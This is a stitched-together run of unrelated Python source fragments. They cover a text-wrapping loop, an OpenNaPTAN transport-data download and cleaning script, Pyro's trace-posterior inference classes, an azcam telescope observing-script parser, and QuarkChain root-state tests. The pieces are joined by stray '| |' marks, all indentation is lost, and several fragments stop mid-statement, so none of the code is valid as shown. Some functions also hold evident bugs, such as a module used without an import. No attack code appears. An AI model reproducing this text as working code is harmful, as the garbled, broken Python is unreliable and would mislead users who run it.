for word in text:
# fill the lists of words and their lengths
# this splits words longer than width into chunks, which each are
# treated as words themselves.
if word.startswith("\n"):
len_word = textlen(word[1:])
else:
len_word = textlen(word)
if len_word <= width: # simple case: word not longer than a line
words.append(word)
len_words.append(len_word)
continue
# deal with an extra long word
w = word[0] # start with 1st char
l = textlen(w) # and its length
for i in | |
# %%
import os
import sys
from collections import Counter
from datetime import datetime, timedelta
from glob import glob
from pathlib import Path
from zipfile import ZipFile
# data wrangling
import geopandas as gpd
import pandas as pd
import numpy as np
import requests
from urllib.error import HTTPError
# data maniuplation
from convertbng.util import convert_lonlat
# logging
from shapely.geometry import Point
import con_checks as con
import geo_checks as geo
# %%
timestr = datetime.now().strftime("%Y_%m_%d")
src_home = Path('./OpenNaPTAN/src/')
data_home = Path('./OpenNaPTAN/data/')
base_path = (f'{os.getcwd()}')
download_home = str(os.path.join(Path.home(), "Downloads"))
naptan_csv_url = 'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format=csv'
naptan_xml_url = 'http://naptan.app.dft.gov.uk/Datarequest/naptan.ashx'
# config options
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', 5)
# %%
def intersect_list_to_masks(df, col_name, value_list):
"""[summary] This is a filter function, that performs an inner join when
given a list object and returns a filtered dataframe of the values in the
given list. You must pass a valid column name and a valid list of strings
expected in that column, will filter out all values not in the list
from the given column, returning a dataframe with only the found entries,
that match the list given values in the given column.
Arguments:
colName {[str]} -- [the pandas column name, as a string]
value_list {[list]} -- [the list of strings to filter the dataframe.]
Returns:
[gdf] -- [a filtered gdf, with only the found list values within. ]
"""
# uses numpy 1d intersection to filter an entire list of strings
mask = df[col_name].apply(lambda x: np.intersect1d(x, value_list).size > 0)
failed_nodes = df[mask]
return failed_nodes
# %%
def downloads_naptan_data(format='csv', local_authority_code=''):
"""[summary] Downloads naptan csv files from the app.dft.gov.uk site.
Assumes no longer is required for accessing the data this route.
Args:
format (str, optional): [description]. Defaults to 'csv'.
local_authority_code (str, optional): [description]. Defaults to ''.
Raises:
NotImplementedError: [description]
NotImplementedError: [description]
ve: [description]
"""
dir = str(os.path.join(Path.home(), "Downloads"))
file = Path(f'{download_home}/{timestr}_Naptan_Data.zip')
try:
# let's check if the naptan zip file exists.
if not file.exists():
print('Downloading the entire Naptan Dataset.')
url = 'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format=csv'
response = requests.get(url)
with open(os.path.join(dir, file), 'wb') as f:
f.write(response.content)
response.close()
# the below isn't supported yet.
elif local_authority_code.isdigit():
url = (f'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format={format}&LA={local_authority_code}')
raise NotImplementedError
# the below isn't support yet.
elif format == 'xml':
url = (f'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format={format}&LA={local_authority_code}')
raise NotImplementedError
else:
return(f'Naptan Data has been for {timestr} has been downloaded.')
except ConnectionError as ce:
sys.exit(f' {ce} No internet connection was found.')
except ConnectionRefusedError as cre:
sys.exit(f'{cre} This system is not allowed to access the Naptan Site.')
except HTTPError as httperror:
sys.exit(f'{httperror} the Naptan download server is unavailable.')
except ValueError as ve:
raise ve
sys.exit('Site is not valid.')
# %%
def extract_naptan_files():
"""[summary] Extracts the downloaded naptan zip file.
Arguments:
naptanzipfile {[type]} -- [description]
dest_dir {[type]} -- [description]
"""
zip_file = Path(f'{download_home}/{timestr}_Naptan_Data.zip')
destination = Path(f'{os.getcwd()}/data/{timestr}_Naptan_Data')
try:
if zip_file.is_file() and zip_file.suffix == '.zip':
with ZipFile(zip_file, "r") as zipobj:
# Extract all the contents of zip file in the working directory
zipobj.extractall(destination)
print(f'Extracting all {destination} files in archive.')
except FileNotFoundError:
sys.exit('Naptan archive file not found.')
except FileExistsError:
sys.exit('File already exists')
except Exception as e:
sys.exit(e)
# %%
def check_naptan_files():
"""[summary] Lists the Naptan files available at the specificed location.
If some files are missing/ or can't be open this should flag a warning.
Arguments:
file_list_location {[Path]} -- [description]
file_ext {[file extension]} -- [description]
Returns:
[type] -- [description]
"""
# TODO check if files are readable
file_list_location = (f'{os.getcwd()}/data/{timestr}_Naptan_Data/')
file_ext = 'csv'
expected_file_names = ['AirReferences',
'AlternativeDescriptors',
'AreaHierarchy',
'CoachReferences',
'FerryReferences',
'Flexible',
'HailRide',
'LocalityMainAccessPoints',
'MetroReferences',
'RailReferences',
'StopAreas',
'StopAvailability',
'StopLocalities',
'StopPlusbusZones',
'Stops',
'StopsInArea']
naptan_file_names = []
# we print out if all the expected files are found and if so in the
# system where.
for expected in expected_file_names:
npfile = Path(f'{file_list_location}{expected}.{file_ext}')
if npfile.is_file() and npfile.exists():
naptan_file_names.append(npfile.stem)
print(f'{npfile.name} as a {file_ext} has been found.')
else:
print(f'The {npfile} is missing or the file extension is wrong.')
# %%
def convert_xml_to_df(xml_doc):
# TODO -- convert xml into a pandas dataframe for easier verification.
""" Description: We can take in the naptan data as a
Args: xml_doc
Returns: returns a panda dataframe of the xml document.
"""
attr = xml_doc.attrib
doc_dict = pd.DataFrame
for xml in xml_doc.iter('document'):
doc_dir = attr.copy()
doc_dir.update(xml.attrib)
doc_dict['data'] = xml.text
return doc_dict
# %%
def file_pep8_cleaning(home, ext):
"""Description: takes a directory and file extension and then renames them
according to
Args:
home: the target directory, only one at once
ext: a file type extension, only one at once
Returns:
"""
home = Path(home)
os.chdir(home)
flist = []
for p in Path().iterdir():
if (p.is_file() and p.suffix == ext):
g = Path(p).stem
flist.append(g)
h = string.capwords(g)
i = h.title()
j = '_'.join([s[0].upper() + s[1:] for s in i.split(' ')])
to_file = Path(home, j)
flist.append(to_file)
p.rename(to_file)
with open((home, 'update_list.txt'), 'w+') as file:
file.write(flist)
# %%
def convert_to_lat_long(df):
"""Descriptions: Converts 100,000+ coordinates in a dataframe
into accurate longitude and latitude adding the columns where they are
missing from a dataframe.
Arguments:
df {[type]} -- [description]
file_name {[type]} -- [description]
"""
easting_np = np.array(df.Easting)
northing_np = np.array(df.Northing)
res_list_np = convert_lonlat(easting_np, northing_np)
df['Longitude'], df['Latitude'] = res_list_np[0], res_list_np[1]
# drop the easting and northing columns, now we are done with them.
df = df.drop(columns=['Easting', 'Northing'], axis=1)
return df
# %%
def deactivated_nodes(df):
"""[summary] - Returns a dataframe of only active, pending, or new nodes
or deleted stops from the last 3 years, for representative sampling.
deleted nodes are removed for the sake of this test. This test is also not,
concerned with reporting errors, as this is a data cleaning function
Arguments:
df {[geopanda dataframe]} -- [The Naptan master dataframe.]
Returns:
[type] -- [description]
"""
# TODO filter this to stops with a modification date time within the last 3
# years so that there is a represenative sample of deactived stops.
try:
exp_date = (datetime.now() - timedelta(days=365*3))
# we filter all the missing deleted stops that are older than 3 yrs.
mask = ~((df['Status'] == 'del') &
(df['ModificationDateTime'] <= exp_date))
active_nodes = df[mask]
# TODO needs to be integrated with reporting function.
# inactive_nodes = df[~mask]
# report.nodes_error_reporting('Inactive Nodes',
# inactive_nodes)
return active_nodes
except FileNotFoundError as file_missing:
raise file_missing
sys.exit(f'{file_missing}')
# %%
def calculate_naptan_geometry(df):
"""[summary] Takes in a dataframe and returns a dataframe
with a geometry column calculate from using lat and lon CRS.
"""
try:
geom_list = [Point(lon, lat) for lon, lat in zip(df["Longitude"],
df["Latitude"])]
gdf = gpd.GeoDataFrame(df,
geometry=geom_list,
crs={"init": "EPSG:4326"})
return gdf
except ValueError:
print('Value Error could not be converted.')
pass
else:
print('Naptan Geometry conversion failed.')
# %%
def get_centroid_naptan_area(df):
"""[summary] to determine where the folium map should be centred, when
generating an ipython view.
Arguments:
df_subframe {[type]} -- [description]
Returns:
[rep_centroid] -- [a fix within geometry point, representative of
all the points in the area.]
"""
length = df['Geometry'].shape[0]
sum_x = np.sum(df['Latitude'])
sum_y = np.sum(df['Longitude'])
cen_x, cen_y = sum_x/length, sum_y/length
return cen_x, cen_y
# %%
def naptan_gazette_districts():
"""[summary] loads the districts codes from the gazette files.
Returns:
[type] -- [description]
"""
cols = ['AdminAreaCode', 'DistrictCode', 'DistrictName']
District_Codes = pd.read_csv(f'{os.getcwd()}/nptgcsv/Districts.csv',
encoding='iso-8859-1',
usecols=cols)
return District_Codes
# %%
def naptan_gazette_region():
"""[summary] loads the Region area codes from the gazette files.
Returns:
[type] -- [description]
"""
cols = ['RegionName', 'RegionCode']
region_codes = pd.read_csv(f'{os.getcwd()}/nptgcsv/Regions.csv',
encoding='iso-8859-1',
usecols=cols)
return region_codes
# %%
def naptan_gazette_admin_area_codes():
"""[summary] loads the admin area codes from the gazette files.
Using nptgcsv files as the source for linking the admin area codes with
the nodes data.
Returns:
[dataframe] -- [Contains the]
"""
cols = ['AdministrativeAreaCode', 'AtcoAreaCode',
'AreaName', 'ShortName', 'RegionCode']
aac = pd.read_csv(f'{os.getcwd()}/nptgcsv/AdminAreas.csv',
encoding='iso-8859-1',
usecols=cols)
aac = aac.rename(columns={'AdministrativeAreaCode': 'AdminAreaCode'})
aac['AdminAreaCode'] = aac['AdminAreaCode'].astype(str)
return aac
# %%
def naptan_gazette_localities():
"""[summary] returns the gazette locality data for use with the stops
data.
"""
cols = ['NptgLocalityCode', 'LocalityName', 'AdministrativeAreaCode',
'QualifierName', 'NptgDistrictCode', 'SourceLocalityType',
'GridType', 'Easting', 'Northing']
gaz_locs = pd.read_csv(f'{os.getcwd()}/nptgcsv/Localities.csv',
encoding='iso-8859-1',
usecols=cols)
gaz_locs = gaz_locs.rename(columns={'AdministrativeAreaCode': 'AdminAreaCode'})
gaz_locs['AdminAreaCode'] = gaz_locs['AdminAreaCode'].astype(str)
gaz_locs = convert_to_lat_long(gaz_locs)
gaz_locs = calculate_naptan_geometry(gaz_locs)
gaz_locs.rename(columns={'NptgLocalityCode': 'NptgLocalityCode',
'LocalityName': 'LocalityName',
'AdminAreaCode': 'AdminCode',
'QualifierName': 'QualifierName',
'NptgDistrictCode': 'NptgDistrictCode',
'SourceLocalityType': 'SourceLocalityType',
'GridType': 'NptgGridType',
'Longitude': 'Gazette_Longitude',
'Latitude': 'Gazette_Latitude',
'Geometry': 'Gazette_geometry',
}, inplace=True)
return gaz_locs
# %%
def map_gazette_data_to_nodes(df, gazette_data, gazette_column):
"""[summary]maps the given gazette reference data and column to the naptan
nodes data.
Arguments:
df {[type]} -- [the naptan dataframe]
gazette_data {[gazette reference data]} -- []
gazette_column {[pandas series column]} -- [description]
Raises:
NotImplemented: [description]
Returns:
[type] -- [description]
"""
# capture the | |
<reponame>ruohoruotsi/pyro
from __future__ import absolute_import, division, print_function
import numbers
from abc import ABCMeta, abstractmethod
from collections import OrderedDict, defaultdict
import torch
from six import add_metaclass
import pyro.poutine as poutine
from pyro.distributions import Categorical, Empirical
from pyro.ops.stats import waic
from .util import site_is_subsample
class EmpiricalMarginal(Empirical):
"""
Marginal distribution over a single site (or multiple, provided they have the same
shape) from the ``TracePosterior``'s model.
.. note:: If multiple sites are specified, they must have the same tensor shape.
Samples from each site will be stacked and stored within a single tensor. See
:class:`~pyro.distributions.Empirical`. To hold the marginal distribution of sites
having different shapes, use :class:`~pyro.infer.abstract_infer.Marginals` instead.
:param TracePosterior trace_posterior: a ``TracePosterior`` instance representing
a Monte Carlo posterior.
:param list sites: optional list of sites for which we need to generate
the marginal distribution.
"""
def __init__(self, trace_posterior, sites=None, validate_args=None):
assert isinstance(trace_posterior, TracePosterior), \
"trace_dist must be trace posterior distribution object"
if sites is None:
sites = "_RETURN"
self._num_chains = 1
self._samples_buffer = defaultdict(list)
self._weights_buffer = defaultdict(list)
self._populate_traces(trace_posterior, sites)
samples, weights = self._get_samples_and_weights()
super(EmpiricalMarginal, self).__init__(samples,
weights,
validate_args=validate_args)
def _get_samples_and_weights(self):
"""
Appends values collected in the samples/weights buffers to their
corresponding tensors.
"""
num_chains = len(self._samples_buffer)
samples_by_chain = []
weights_by_chain = []
for i in range(num_chains):
samples = torch.stack(self._samples_buffer[i], dim=0)
samples_by_chain.append(samples)
weights_dtype = samples.dtype if samples.dtype.is_floating_point else torch.float32
weights = torch.as_tensor(self._weights_buffer[i], device=samples.device, dtype=weights_dtype)
weights_by_chain.append(weights)
if len(samples_by_chain) == 1:
return samples_by_chain[0], weights_by_chain[0]
else:
return torch.stack(samples_by_chain, dim=0), torch.stack(weights_by_chain, dim=0)
def _add_sample(self, value, log_weight=None, chain_id=0):
"""
Adds a new data point to the sample. The values in successive calls to
``add`` must have the same tensor shape and size. Optionally, an
importance weight can be specified via ``log_weight`` or ``weight``
(default value of `1` is used if not specified).
:param torch.Tensor value: tensor to add to the sample.
:param torch.Tensor log_weight: log weight (optional) corresponding
to the sample.
:param int chain_id: chain id that generated the sample (optional).
Note that if this argument is provided, ``chain_id`` must lie
in ``[0, num_chains - 1]``, and there must be equal number
of samples per chain.
"""
# Apply default weight of 1.0.
if log_weight is None:
log_weight = 0.0
if self._validate_args and not isinstance(log_weight, numbers.Number) and log_weight.dim() > 0:
raise ValueError("``weight.dim() > 0``, but weight should be a scalar.")
# Append to the buffer list
self._samples_buffer[chain_id].append(value)
self._weights_buffer[chain_id].append(log_weight)
self._num_chains = max(self._num_chains, chain_id + 1)
def _populate_traces(self, trace_posterior, sites):
assert isinstance(sites, (list, str))
for tr, log_weight, chain_id in zip(trace_posterior.exec_traces,
trace_posterior.log_weights,
trace_posterior.chain_ids):
value = tr.nodes[sites]["value"] if isinstance(sites, str) else \
torch.stack([tr.nodes[site]["value"] for site in sites], 0)
self._add_sample(value, log_weight=log_weight, chain_id=chain_id)
class Marginals(object):
"""
Holds the marginal distribution over one or more sites from the ``TracePosterior``'s
model. This is a convenience container class, which can be extended by ``TracePosterior``
subclasses. e.g. for implementing diagnostics.
:param TracePosterior trace_posterior: a TracePosterior instance representing
a Monte Carlo posterior.
:param list sites: optional list of sites for which we need to generate
the marginal distribution.
"""
def __init__(self, trace_posterior, sites=None, validate_args=None):
assert isinstance(trace_posterior, TracePosterior), \
"trace_dist must be trace posterior distribution object"
if sites is None:
sites = ["_RETURN"]
elif isinstance(sites, str):
sites = [sites]
else:
assert isinstance(sites, list)
self.sites = sites
self._marginals = OrderedDict()
self._diagnostics = OrderedDict()
self._trace_posterior = trace_posterior
self._populate_traces(trace_posterior, validate_args)
def _populate_traces(self, trace_posterior, validate):
self._marginals = {site: EmpiricalMarginal(trace_posterior, site, validate)
for site in self.sites}
def support(self, flatten=False):
"""
Gets support of this marginal distribution.
:param bool flatten: A flag to decide if we want to flatten `batch_shape`
when the marginal distribution is collected from the posterior with
``num_chains > 1``. Defaults to False.
:returns: a dict with keys are sites' names and values are sites' supports.
:rtype: :class:`OrderedDict`
"""
support = OrderedDict([(site, value.enumerate_support())
for site, value in self._marginals.items()])
if self._trace_posterior.num_chains > 1 and flatten:
for site, samples in support.items():
shape = samples.size()
flattened_shape = torch.Size((shape[0] * shape[1],)) + shape[2:]
support[site] = samples.reshape(flattened_shape)
return support
@property
def empirical(self):
"""
A dictionary of sites' names and their corresponding :class:`EmpiricalMarginal`
distribution.
:type: :class:`OrderedDict`
"""
return self._marginals
@add_metaclass(ABCMeta)
class TracePosterior(object):
"""
Abstract TracePosterior object from which posterior inference algorithms inherit.
When run, collects a bag of execution traces from the approximate posterior.
This is designed to be used by other utility classes like `EmpiricalMarginal`,
that need access to the collected execution traces.
"""
def __init__(self, num_chains=1):
self.num_chains = num_chains
self._reset()
def _reset(self):
self.log_weights = []
self.exec_traces = []
self.chain_ids = [] # chain id corresponding to the sample
self._idx_by_chain = [[] for _ in range(self.num_chains)] # indexes of samples by chain id
self._categorical = None
def marginal(self, sites=None):
"""
Generates the marginal distribution of this posterior.
:param list sites: optional list of sites for which we need to generate
the marginal distribution.
:returns: A :class:`Marginals` class instance.
:rtype: :class:`Marginals`
"""
return Marginals(self, sites)
@abstractmethod
def _traces(self, *args, **kwargs):
"""
Abstract method implemented by classes that inherit from `TracePosterior`.
:return: Generator over ``(exec_trace, weight)`` or
``(exec_trace, weight, chain_id)``.
"""
raise NotImplementedError("Inference algorithm must implement ``_traces``.")
def __call__(self, *args, **kwargs):
# To ensure deterministic sampling in the presence of multiple chains,
# we get the index from ``idxs_by_chain`` instead of sampling from
# the marginal directly.
random_idx = self._categorical.sample().item()
chain_idx, sample_idx = random_idx % self.num_chains, random_idx // self.num_chains
sample_idx = self._idx_by_chain[chain_idx][sample_idx]
trace = self.exec_traces[sample_idx].copy()
for name in trace.observation_nodes:
trace.remove_node(name)
return trace
def run(self, *args, **kwargs):
"""
Calls `self._traces` to populate execution traces from a stochastic
Pyro model.
:param args: optional args taken by `self._traces`.
:param kwargs: optional keywords args taken by `self._traces`.
"""
self._reset()
with poutine.block():
for i, vals in enumerate(self._traces(*args, **kwargs)):
if len(vals) == 2:
chain_id = 0
tr, logit = vals
else:
tr, logit, chain_id = vals
assert chain_id < self.num_chains
self.exec_traces.append(tr)
self.log_weights.append(logit)
self.chain_ids.append(chain_id)
self._idx_by_chain[chain_id].append(i)
self._categorical = Categorical(logits=torch.tensor(self.log_weights))
return self
def information_criterion(self, pointwise=False):
"""
Computes information criterion of the model. Currently, returns only "Widely
Applicable/Watanabe-Akaike Information Criterion" (WAIC) and the corresponding
effective number of parameters.
Reference:
[1] `Practical Bayesian model evaluation using leave-one-out cross-validation and WAIC`,
<NAME>, <NAME>, and <NAME>
:param bool pointwise: a flag to decide if we want to get a vectorized WAIC or not. When
``pointwise=False``, returns the sum.
:returns: a dictionary containing values of WAIC and its effective number of
parameters.
:rtype: :class:`OrderedDict`
"""
if not self.exec_traces:
return {}
obs_node = None
log_likelihoods = []
for trace in self.exec_traces:
obs_nodes = trace.observation_nodes
if len(obs_nodes) > 1:
raise ValueError("Infomation criterion calculation only works for models "
"with one observation node.")
if obs_node is None:
obs_node = obs_nodes[0]
elif obs_node != obs_nodes[0]:
raise ValueError("Observation node has been changed, expected {} but got {}"
.format(obs_node, obs_nodes[0]))
log_likelihoods.append(trace.nodes[obs_node]["fn"]
.log_prob(trace.nodes[obs_node]["value"]))
ll = torch.stack(log_likelihoods, dim=0)
waic_value, p_waic = waic(ll, torch.tensor(self.log_weights, device=ll.device), pointwise)
return OrderedDict([("waic", waic_value), ("p_waic", p_waic)])
class TracePredictive(TracePosterior):
"""
Generates and holds traces from the posterior predictive distribution,
given model execution traces from the approximate posterior. This is
achieved by constraining latent sites to randomly sampled parameter
values from the model execution traces and running the model forward
to generate traces with new response ("_RETURN") sites.
:param model: arbitrary Python callable containing Pyro primitives.
:param TracePosterior posterior: trace posterior instance holding samples from the model's approximate posterior.
:param int num_samples: number of samples to generate.
:param keep_sites: The sites which should be sampled from posterior distribution (default: all)
"""
def __init__(self, model, posterior, num_samples, keep_sites=None):
self.model = model
self.posterior = posterior
self.num_samples = num_samples
self.keep_sites = keep_sites
super(TracePredictive, self).__init__()
def _traces(self, *args, **kwargs):
if not self.posterior.exec_traces:
self.posterior.run(*args, **kwargs)
data_trace = poutine.trace(self.model).get_trace(*args, **kwargs)
for _ in range(self.num_samples):
model_trace = self.posterior().copy()
self._remove_dropped_nodes(model_trace)
self._adjust_to_data(model_trace, data_trace)
resampled_trace = poutine.trace(poutine.replay(self.model, model_trace)).get_trace(*args, **kwargs)
yield (resampled_trace, 0., 0)
def _remove_dropped_nodes(self, trace):
if self.keep_sites is None:
return
for name, site in list(trace.nodes.items()):
if name not in self.keep_sites:
trace.remove_node(name)
continue
def _adjust_to_data(self, trace, data_trace):
for name, site in list(trace.nodes.items()):
# Adjust subsample sites
if site_is_subsample(site):
site["fn"] = data_trace.nodes[name]["fn"]
site["value"] = data_trace.nodes[name]["value"]
# Adjust sites under conditionally independent stacks
try:
site["cond_indep_stack"] = data_trace.nodes[name]["cond_indep_stack"]
site["fn"] = data_trace.nodes[name]["fn"]
for cis in site["cond_indep_stack"]:
# Select random sub-indices | |
"""
Observe class.
Notes:
IPython config needs:
c.InteractiveShellApp.gui = 'qt'
c.InteractiveShellApp.pylab = 'qt'
"""
import os
import time
from tkinter import E
import azcam
class ObserveCommon(object):
"""
The ObserveCommon class which implements observing scripts.
"""
def __init__(self, tool_id="observe", description=None):
self.mock = 0 # True to NOT execute commands
self.debug = 0 # True for debugging
self.verbose = 1 # True to print commands during run()
self.number_cycles = 1 # Number of times to run the script.
self.move_telescope_during_readout = 0 # True to move the telescope during camera readout
self.increment_status = 0 # True to increment status count if command in completed
self._abort_gui = 0 # internal abort flag to stop
self._paused = 0 # internal pause flag
self._do_highlight = 0 # internal highlight row flag
self.script_file = "" # filename of observing commands cript file
self.out_file = "" # output file showing executed commands
self.lines = []
self.commands = [] # list of dictionaries for each command to be executed
self.current_line = -1 # current line being executed
self.current_filter = "" # current filter
self._abort_script = 0 # internal abort flag to stop scipt
self.data = [] # list of dictionaries for each command to be executed
#: focus tool for motion - usually "instrument" or "telescope"
self.focus_component = "instrument"
#: Coordinates mode - True to use AZ/ALT instead of RA/DEC
self.azalt_mode = False
self.gui_mode = 0
def help(self):
"""
Print help on scripting commands.
"""
print("Observing script help...")
print("")
print('Always use double quotes (") when needed')
print("")
print("Comment lines start with # or !")
print("")
print("obs ExposureTime imagetype Title NumberExposures Filter RA DEC Epoch")
print("test ExposureTime imagetype Title NumberExposures Filter RA DEC Epoch")
print("")
print("stepfocus RelativeNumberSteps")
print("steptel RA_ArcSecs Dec_ArcSecs")
print("movetel RA Dec Epoch")
print("movefilter FilterName")
print("")
print("delay NumberSecs")
print('print hi there"')
print('prompt "press any key to continue..."')
print("quit quit script")
print("")
print("Script line examples:")
print('obs 10.5 object "M31 field F" 1 u 00:36:00 40:30:00 2000.0 ')
print('obs 2.3 dark "mike test dark" 2 u')
print("stepfocus 50")
print("delay 3")
print("stepfocus -50")
print("steptel 12.34 12.34")
print("# this is a comment line")
print("! this is also a comment line")
print("movetel 112940.40 +310030.0 2000.0")
print("")
return
def _get_focus(
self,
focus_id: int = 0,
):
if self.focus_component == "instrument":
return azcam.db.tools["instrument"].get_focus(focus_id)
elif self.focus_component == "telescope":
return azcam.db.tools["telescope"].get_focus(focus_id)
def _set_focus(self, focus_value: float, focus_id: int = 0, focus_type: str = "absolute"):
if self.focus_component == "instrument":
return azcam.db.tools["instrument"].set_focus(focus_value, focus_id, focus_type)
elif self.focus_component == "telescope":
return azcam.db.tools["telescope"].set_focus(focus_value, focus_id, focus_type)
def read_file(self, script_file):
"""
Read an observing script file into the .lines list.
Args:
script_file: full path name of script file.
"""
self.script_file = script_file
# make output filename by appending _out to base filename
base, ext = os.path.splitext(self.script_file)
self.out_file = base + "_out" + ext
# read file
with open(self.script_file, "r") as sfile:
all_lines = sfile.readlines()
# save all lines
self.lines = []
self.commands = [] # list of dictionaries, one for each line
for line in all_lines:
if line == "\n":
continue
line = line.strip()
self.lines.append(line)
return
def parse(self):
"""
Parse current line set into self.commands dictionary.
The script file must have already been read using read_file().
"""
for linenumber, line in enumerate(self.lines):
expose_flag = 0
movetel_flag = 0
steptel_flag = 0
movefilter_flag = 0
movefocus_flag = 0
wave = ""
focus = ""
ra = ""
dec = ""
raNext = ""
decNext = ""
epoch = ""
exptime = 0.0
imagetype = ""
arg = ""
title = ""
numexposures = 0
status = 0
tokens = azcam.utils.parse(line)
# comment line, special case
if line.startswith("#") or line.startswith("!") or line.startswith("comment"):
cmd = "comment"
arg = line[1:].strip()
# if the first token is a number, it is a status flag - save and remove from parsing
elif tokens[0].isdigit():
status = int(tokens[0])
line = line.lstrip(tokens[0]).strip()
tokens = tokens[1:] # reset tokens to not include status
cmd = tokens[0].lower()
else:
status = -1 # indicates no status value
cmd = tokens[0].lower()
# comment
if cmd == "comment":
pass
# prompt, use quotes for string
elif cmd == "prompt":
arg = tokens[1]
# immediately set a value
elif cmd == "set":
attribute = tokens[1]
value = tokens[2]
arg = " ".join(tokens[1:])
if attribute == "mock":
self.mock = int(value)
elif attribute == "debug":
self.debug = int(value)
elif attribute == "azalt_mode":
self.azalt_mode = int(value)
if self.gui_mode:
self.ui.checkBox_azalt.setChecked(self.azalt_mode)
elif attribute == "move_telescope_during_readout":
self.move_telescope_during_readout = int(value)
elif attribute == "number_cycles":
self.number_cycles = int(value)
if self.gui_mode:
self.ui.spinBox_loops.setValue(self.number_cycles)
continue
# print
elif cmd == "print":
arg = tokens[1]
# issue a raw server which should be in single quotes
elif cmd == "azcam":
arg = tokens[1]
# take a normal observation
elif cmd == "obs":
# obs 10.5 object "M31 field F" 1 U 00:36:00 40:30:00 2000.0
exptime = float(tokens[1])
imagetype = tokens[2]
title = tokens[3].strip('"') # remove double quotes
numexposures = int(tokens[4])
expose_flag = 1
if len(tokens) > 5:
wave = tokens[5].strip('"')
movefilter_flag = 1
if len(tokens) > 6:
ra = tokens[6]
dec = tokens[7]
if len(tokens) > 8:
epoch = tokens[8]
else:
epoch = 2000.0
movetel_flag = 1
else:
ra = ""
dec = ""
epoch = ""
movetel_flag = 0
# take test images
elif cmd == "test":
# test 10.5 object "M31 field F" 1 U 00:36:00 40:30:00 2000.0
exptime = float(tokens[1])
imagetype = tokens[2]
title = tokens[3].strip('"')
numexposures = int(tokens[4])
expose_flag = 1
if len(tokens) > 5:
wave = tokens[5].strip('"')
movefilter_flag = 1
if len(tokens) > 6:
ra = tokens[6]
dec = tokens[7]
if len(tokens) > 8:
epoch = tokens[8]
else:
epoch = 2000.0
movetel_flag = 1
else:
ra = ""
dec = ""
epoch = ""
movetel_flag = 0
# move focus position in relative steps from current position
elif cmd == "stepfocus":
# stepfocus RelativeSteps
focus = float(tokens[1])
movefocus_flag = 1
# move filter
elif cmd == "movefilter":
# movefilter FilterName
wave = tokens[1]
movefilter_flag = 1
# move telescope to absolute RA DEC EPOCH
elif cmd == "movetel":
# movetel ra dec
ra = tokens[1]
dec = tokens[2]
epoch = tokens[3]
movetel_flag = 1
# slew telescope to absolute RA DEC EPOCH
elif cmd == "slewtel":
# slewtel ra dec
ra = tokens[1]
dec = tokens[2]
epoch = tokens[3]
movetel_flag = 1
# move telescope relative RA DEC
elif cmd == "steptel":
# steptel raoffset decoffset
ra = tokens[1]
dec = tokens[2]
movetel_flag = 1
# delay N seconds
elif cmd == "delay":
delay = float(tokens[1])
arg = delay
# quit script
elif cmd == "quit":
pass
else:
azcam.log("command not recognized on line %03d: %s" % (linenumber, cmd))
# get next RA and DEC if next line is obs command
raNext = ""
decNext = ""
epochNext = ""
if linenumber == len(self.lines) - 1: # last line
pass
else:
lineNext = self.lines[linenumber + 1]
tokensNext = azcam.utils.parse(lineNext)
lentokNext = len(tokensNext)
if lentokNext != 0:
cmdNext = tokensNext[0].lower()
if cmdNext == "obs" and lentokNext > 6:
try:
raNext = tokensNext[6]
decNext = tokensNext[7]
epochNext = tokensNext[8]
except Exception:
raNext = ""
decNext = ""
epochNext = ""
else:
pass
data1 = {}
data1["line"] = line
data1["cmdnumber"] = linenumber
data1["status"] = status
data1["command"] = cmd
data1["argument"] = arg
data1["exptime"] = exptime
data1["type"] = imagetype
data1["title"] = title
data1["numexp"] = numexposures
data1["filter"] = wave
data1["focus"] = focus
data1["ra"] = ra
data1["dec"] = dec
data1["ra_next"] = raNext
data1["dec_next"] = decNext
data1["epoch"] = epoch
data1["epoch_next"] = epochNext
data1["expose_flag"] = expose_flag
data1["movetel_flag"] = movetel_flag
data1["steptel_flag"] = steptel_flag
data1["movefilter_flag"] = movefilter_flag
data1["movefocus_flag"] = movefocus_flag
self.commands.append(data1)
return
def log(self, message):
"""
Log a message.
Args:
message: string to be logged.
"""
azcam.log(message)
return
def run(self):
"""
Execute the commands in the script command dictionary.
"""
self._abort_script = 0
# save pars to be changed
impars = {}
azcam.utils.save_imagepars(impars)
# log start info
s = time.strftime("%Y-%m-%d %H:%M:%S")
self.log("Observing script started: %s" % s)
# begin execution loop
for loop in range(self.number_cycles):
if self.number_cycles > 1:
| |
import unittest
import quarkchain.db
from quarkchain.cluster.root_state import RootState
from quarkchain.cluster.shard_state import ShardState
from quarkchain.cluster.tests.test_utils import get_test_env
from quarkchain.core import Address
from quarkchain.core import CrossShardTransactionList
from quarkchain.diff import EthDifficultyCalculator
def create_default_state(env, diff_calc=None):
r_state = RootState(env=env, diff_calc=diff_calc)
s_state_list = dict()
for full_shard_id in env.quark_chain_config.get_full_shard_ids():
shard_state = ShardState(
env=env, full_shard_id=full_shard_id, db=quarkchain.db.InMemoryDb()
)
mblock, coinbase_amount_map = shard_state.init_genesis_state(
r_state.get_tip_block()
)
block_hash = mblock.header.get_hash()
r_state.add_validated_minor_block_hash(
block_hash, coinbase_amount_map.balance_map
)
s_state_list[full_shard_id] = shard_state
# add a root block so that later minor blocks will be broadcasted to neighbor shards
minor_header_list = []
for state in s_state_list.values():
minor_header_list.append(state.header_tip)
root_block = r_state.create_block_to_mine(minor_header_list)
assert r_state.add_block(root_block)
for state in s_state_list.values():
assert state.add_root_block(root_block)
return r_state, s_state_list
def add_minor_block_to_cluster(s_states, block):
"""Add block to corresponding shard state and broadcast xshard list to other shards"""
full_shard_id = block.header.branch.get_full_shard_id()
s_states[full_shard_id].finalize_and_add_block(block)
block_hash = block.header.get_hash()
for dst_full_shard_id, state in s_states.items():
if dst_full_shard_id == full_shard_id:
continue
state.add_cross_shard_tx_list_by_minor_block_hash(
block_hash, CrossShardTransactionList(tx_list=[])
)
class TestRootState(unittest.TestCase):
def test_root_state_simple(self):
env = get_test_env()
state = RootState(env=env)
self.assertEqual(state.tip.height, 0)
def test_root_state_and_shard_state_add_block(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
self.assertEqual(r_state.tip.total_difficulty, 2000000)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b0)
b1 = s_state1.create_block_to_mine()
